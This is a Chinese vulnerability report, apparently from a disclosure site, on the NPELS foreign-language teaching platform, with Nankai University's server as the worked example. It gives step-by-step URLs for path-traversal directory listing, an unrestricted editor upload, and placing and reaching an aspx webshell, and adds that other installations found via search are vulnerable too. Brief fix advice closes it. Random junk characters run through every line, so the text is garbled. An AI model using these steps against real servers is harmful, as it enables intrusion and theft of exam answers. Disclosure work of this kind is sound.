好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中, \7 F I, z U
0 e$ n' ]8 K. c% w详细说明:
p- [; o. @; Z8 o! R 9 o! t1 F) X; _, ^* o
以南开大学的为例:
2 X3 y) P. g: V3 Y8 j% |http://222.30.60.3/NPELS
% y) }& |& }3 PNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
# A3 ~2 ~4 a4 E* o<setting name="Update_CommonSvr_CommonService" serializeAs="String">
( y% I9 C/ P: o& W+ m2 d<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
; }: i3 v% e. R$ Z</setting>
4 A* s+ ~% b$ R及版本号& r$ E0 \9 w* `$ o c$ E
<add key="TVersion" value="1, 0, 0, 2187">6 s9 X. r1 O- {
</add>% {% m, F+ ]( l% a
直接访问) E; ~% i- v D# [3 }+ W9 S+ V
http://222.30.60.3/NPELS/CommonService.asmx
3 T1 b1 W2 Z8 o0 m/ L% P使用GetTestClientFileList操作,直接 HTTP GET 列目录:3 p* m+ k/ q; Y {1 s& [
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 21879 f" l l& o/ c4 @3 O6 s* w+ d
进一步列目录(返回的网页很大,可以直接 wget 下来)' F7 M2 t8 R4 y8 n( h0 A
http://222.30.60.3/NPELS/CommonS ... List?version=../../
# `! Q& o! |, j. u: l
! f8 a1 v& m; l( y发现
; _9 Q" f- a. t8 fhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm9 G5 G' B b) c: |* H
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
7 ~( k) {; G# z上传后继续列目录找到木马地址直接访问即可
* `7 C1 j4 a, s9 {$ K 5 R/ P$ Q/ e) W9 W" d
OOXX9 G) d$ n) D/ q( z/ Q$ X. ?- m2 z
1 F" S+ p5 y8 N: S& j; g2 M, BGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
* }7 k5 q5 a! G4 L& B$ u漏洞证明:, V( [# ?2 f+ x$ a! c7 x R( c4 E
4 B7 M. Z0 ]- Q0 @) M8 f列目录:
1 ~, ]$ J3 e# E2 t& dhttp://222.30.60.3/NPELS/CommonS ... List?version=../../% k% P; V A5 ~2 N/ L
文件上传:: u2 b0 F, a: j* |* r! m
http://222.30.60.3/npelsv/editor/editor.htm4 ?! I: E4 ^2 A5 k- _
" F& r U, i/ l9 f& q+ Z+ v4 E上传木马:3 b% x& ? g3 B) v8 o' _0 r
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx. C/ y* C4 j! i. Y5 a# X7 k
3 S5 G% Y1 b+ I3 b修复方案:
' q q2 G7 T) N7 h好像考试系统必须使用 CommonService.asmx
/ X9 s) f8 g1 ?最好配置文件加密或者用别的方式不让它泄露出来; }! s. h! B; g) k E6 @" E
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
8 C: u& `$ ~ H" v& s |